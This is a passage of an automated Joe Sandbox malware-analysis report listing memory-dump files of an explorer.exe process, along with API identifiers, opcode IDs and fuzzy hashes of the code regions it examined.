• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: CloseFreeHandleLocal
• String ID:
• API String ID: 836400252-0
• Opcode ID: 5946f75d4281cf458fac700386fabe8289b454c7aac5af985b5156ca8fb65c3d
• Instruction ID: 2801a59183252a1eb93d0448d6df225bc6a624e02f40276663c9f8921f9b58fb
• Opcode Fuzzy Hash: 5946f75d4281cf458fac700386fabe8289b454c7aac5af985b5156ca8fb65c3d
• Instruction Fuzzy Hash: 3DF0C921214CC181FB219B56F8B8B6D63A0F780B69F502375E54A865B4CFBCC8CEDB01
APIs
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: CloseFreeHandleLocal
• String ID:
• API String ID: 836400252-0
• Opcode ID: 8483f27cf3c202a42093d3c09f44cd1b5990f8809433e4656333d8c12ef8bf92
• Instruction ID: 2801a59183252a1eb93d0448d6df225bc6a624e02f40276663c9f8921f9b58fb
• Opcode Fuzzy Hash: 8483f27cf3c202a42093d3c09f44cd1b5990f8809433e4656333d8c12ef8bf92
• Instruction Fuzzy Hash: 3DF0C921214CC181FB219B56F8B8B6D63A0F780B69F502375E54A865B4CFBCC8CEDB01
APIs
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: FreeLocal$CloseHandle
• String ID:
• API String ID: 2045616094-0
• Opcode ID: 3cae6b998a735656f007d17f4acdc30651bed47cb146deaa7af56f0f97f08863
• Instruction ID: f7fc5cd8ee5942133479a987eb03f4c1f6325eb04175a3696034c1abd98fe799
• Opcode Fuzzy Hash: 3cae6b998a735656f007d17f4acdc30651bed47cb146deaa7af56f0f97f08863
• Instruction Fuzzy Hash: CAF00735624AC4C2FB21AB65F87476D6371F7C8B91F504212DA4E43768CE38D54DD700